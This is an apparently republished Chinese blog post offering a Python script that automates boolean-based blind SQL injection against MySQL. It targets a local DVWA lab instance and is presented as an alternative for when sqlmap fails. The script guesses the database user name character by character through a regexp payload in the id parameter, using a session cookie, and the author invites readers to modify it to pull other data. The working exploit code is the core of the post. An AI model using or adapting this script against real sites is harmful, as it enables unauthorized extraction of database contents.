前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Mysql布尔注入自动化脚本

Mysql布尔注入自动化脚本

作者头像
Jumbo
发布2019-05-07 17:13:29
1.1K0
发布2019-05-07 17:13:29
举报
文章被收录于专栏:中国白客联盟中国白客联盟

各种原因,可能导致sqlmap跑不出来,这个时候,自己写脚本就派上用场了,这里写了个简单的脚本,脚本内容是跑user,需要可以自己改。

import requests def GetQ(): pd = '' payload = '0123456789abcdefghijklmnopqrstuvwxyz!_@%' for i in range(30): for p in payload: url = "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20and%20user()%20regexp%20%27^{}%27 and 'j'like'j&Submit=Submit#".format(pd+p) headers = {"Cookie":"security=low; PHPSESSID=65cba547699cda5ab206c6693735c8c6"} get = requests.get(url,headers=headers) if 'Surname' in get.content: # print p pd+=p print pd GetQ()

https://github.com/Jumbo-WJB/notes/blob/master/bool_sqli.py

本地测试结果

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-02-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 中国白客联盟 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档